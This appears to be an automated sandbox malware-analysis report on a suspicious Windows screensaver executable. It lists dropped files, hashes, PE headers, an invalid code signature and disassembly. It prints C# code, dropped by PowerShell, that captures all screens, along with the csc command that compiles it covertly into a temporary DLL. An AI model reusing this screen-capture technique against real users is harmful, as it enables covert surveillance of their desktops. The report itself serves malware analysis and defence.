                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.1025177477737977
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7Ynqq5QPN5Dlq5J:+RI+ycuZhNYHakS5QPNnqX
                                                      MD5:534D9872A18FC984492136CBBA33107D
                                                      SHA1:6E40341E4AFF4020D06CE4CE53B984A004258CEA
                                                      SHA-256:0806E28A5CC875BB521F72D627BB1FB79107856314270E7BA8E2894F7A9227FE
                                                      SHA-512:3847B8A139F7AA311823A6005E4F421A5E6F4F39A36E464E6AF15A5347578DBD7E49106C497BF69A25EAF649331566D5564155232365C8919FB9AB5BA27A6FCE
                                                      Malicious:false
                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1004
                                                      Entropy (8bit):4.154581034278981
                                                      Encrypted:false
                                                      SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                      MD5:C76055A0388B713A1EABE16130684DC3
                                                      SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                      SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                      SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                      Malicious:false
                                                      Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):609
                                                      Entropy (8bit):5.341114417844032
                                                      Encrypted:false
                                                      SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikqCH1WZE2CHw:V3ka6KOkqeFkqC6E2CQ
                                                      MD5:6898FC326023442676AB42EB04FC87EC
                                                      SHA1:94E97A662A66D79825E45C5D5694347D1376B87D
                                                      SHA-256:6D24E48E7E6794EFC5942E5D685043980B1087D366C9AF64614F33FF472F4142
                                                      SHA-512:4D3949F172D7D696557E8CF51B6D1230A268A2B459DB2BE7FB4E9B6054BD898B6CDC3CE40892EB4BBB87C8A1BBA3FA19940889069F2D7E195CDEBD338B04C594
                                                      Malicious:true
                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs"
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):4096
                                                      Entropy (8bit):3.1591920905661808
                                                      Encrypted:false
                                                      SSDEEP:48:6Za7oEAtf0KhzBU/Mf6mtJnN0mcpW1ul2a3Cq:kNz0jmvOFoK
                                                      MD5:E069FDF304E8B7C2D9AA9475290D6483
                                                      SHA1:519DE564D3FAA9FA6D1B168F1BC617ED97B11342
                                                      SHA-256:84EFF732B4BC159437537D26EE00F4CF054BD2FFF788A098B71E4DBD9A858B9C
                                                      SHA-512:A89FE9D5F38F0FAD13A66DFAED06E8454DED8D4114B603E095DCD2EC48258DA31C30CDB1F225F7F7979E09B7CADB3B38E17920142EF2E8D9A7E0D6314F62B8D7
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):1151
                                                      Entropy (8bit):5.50803370443689
                                                      Encrypted:false
                                                      SSDEEP:24:KLfRId3ka6KOkqeFkqC6E2CFKax5DqBVKVrdFAMBJTH:2fRkka6NkqeFkqC6E2CFK2DcVKdBJj
                                                      MD5:FE8D26AC51A41FE5617A8A776067B773
                                                      SHA1:0541851E14807CAC8F7B62D582DFAB6D5BCFF4D4
                                                      SHA-256:D612240B5B16AD6C1E0D7C39868D23575862E9E58CADE0B01F1B6FFA263374A1
                                                      SHA-512:46B8E395141DC3179E2BFBC084127ECEDC9291BA6D761CF4BA68D0715B6B27C43A6AC112638A5D049704AD9707B4455B0B352514EA7992AEBB10143DA7DB3D63
                                                      Malicious:false
                                                      Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon
                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):97
                                                      Entropy (8bit):4.331807756485642
                                                      Encrypted:false
                                                      SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                      MD5:195D02DA13D597A52F848A9B28D871F6
                                                      SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                      SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                      SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                      Malicious:false
                                                      Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):7.994157894224668
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:#U202f#U202f#U2005#U00a0.scr.exe
                                                      File size:8'505'922 bytes
                                                      MD5:d87b402b821fa842d89283aa8654d9c0
                                                      SHA1:30c086651e1bcd191163c01efbab55f51ec04691
                                                      SHA256:791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
                                                      SHA512:37ff5b178e10c2a64ca5cd3c11b2dd8ac153de7b62f363f2a0b608590befa07bc4e8f35a2ab7e57fb2b9ec06e2a91dfad99ce024cc787a777b410f5e0ad81de8
                                                      SSDEEP:196608:WoeEzryqpLjv+bhqNVoB8Ck5c7GpNlpq41J2jnFHbk9qtlDfJP:EWyKL+9qz88Ck+7q3p91Jin8qfZ
                                                      TLSH:7B86336873100CF1DA6AA23DCA12856CDBB3BE622765C5DB0368A3365F178D48C3BF55
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x14000c1f0
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x65833292 [Wed Dec 20 18:29:38 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:2
                                                      File Version Major:5
                                                      File Version Minor:2
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:2
                                                      Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                      Signature Valid:false
                                                      Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                      Subject Chain
                                                      • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                      Version:3
                                                      Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                      Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                      Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                      Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      call 00007F6B0510C07Ch
                                                      dec eax
                                                      add esp, 28h
                                                      jmp 00007F6B0510BC8Fh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      dec eax
                                                      sub esp, 28h
                                                      call 00007F6B0510C5F4h
                                                      test eax, eax
                                                      je 00007F6B0510BE33h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov ecx, dword ptr [eax+08h]
                                                      jmp 00007F6B0510BE17h
                                                      dec eax
                                                      cmp ecx, eax
                                                      je 00007F6B0510BE26h
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [0003427Ch], ecx
                                                      jne 00007F6B0510BE00h
                                                      xor al, al
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      mov al, 01h
                                                      jmp 00007F6B0510BE09h
                                                      int3
                                                      int3
                                                      int3
                                                      inc eax
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      movzx eax, byte ptr [00034267h]
                                                      test ecx, ecx
                                                      mov ebx, 00000001h
                                                      cmove eax, ebx
                                                      mov byte ptr [00034257h], al
                                                      call 00007F6B0510C3F3h
                                                      call 00007F6B0510D512h
                                                      test al, al
                                                      jne 00007F6B0510BE16h
                                                      xor al, al
                                                      jmp 00007F6B0510BE26h
                                                      call 00007F6B0511A4B1h
                                                      test al, al
                                                      jne 00007F6B0510BE1Bh
                                                      xor ecx, ecx
                                                      call 00007F6B0510D522h
                                                      jmp 00007F6B0510BDFCh
                                                      mov al, bl
                                                      dec eax
                                                      add esp, 20h
                                                      pop ebx
                                                      ret
                                                      int3
                                                      int3
                                                      int3
                                                      inc eax
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      cmp byte ptr [0003421Ch], 00000000h
                                                      mov ebx, ecx
                                                      jne 00007F6B0510BE79h
                                                      cmp ecx, 01h
                                                      jnbe 00007F6B0510BE7Ch
                                                      call 00007F6B0510C55Ah
                                                      test eax, eax
                                                      je 00007F6B0510BE3Ah
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3cdcc0x78.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x924.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22a4.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x81a5fa0x2448
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x470000x75c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3a3300x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a1f00x140.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x29c900x29e0062616acf257019688180f494b4eb78d4False0.5523087686567164data6.4831047330596565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x2b0000x12bf40x12c007aa3d5eab610b40e57242dc83c401270False0.5184765625data5.835065642995783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x3e0000x33380xe0099d84572872f2ce8d9bdbc2521e1966eFalse0.1328125Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8271683819747706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x420000x22a40x240039f0a7d8241a665fc55289b5f9977819False0.4720052083333333data5.316391891279308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      _RDATA0x450000x15c0x200624222957a635749731104f8cdf6f9b7False0.38671875data2.83326547900447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .rsrc0x460000x9240xa00cd17ad3571acb68f6e691815ac5f5a72False0.4203125data5.142657713443727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x470000x75c0x8004138d4447f190c2657ec208ef31be551False0.5458984375data5.240127521097618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x460a00x374data0.45361990950226244
                                                      RT_MANIFEST0x464140x50dXML 1.0 document, ASCII text0.4694508894044857
                                                      DLLImport
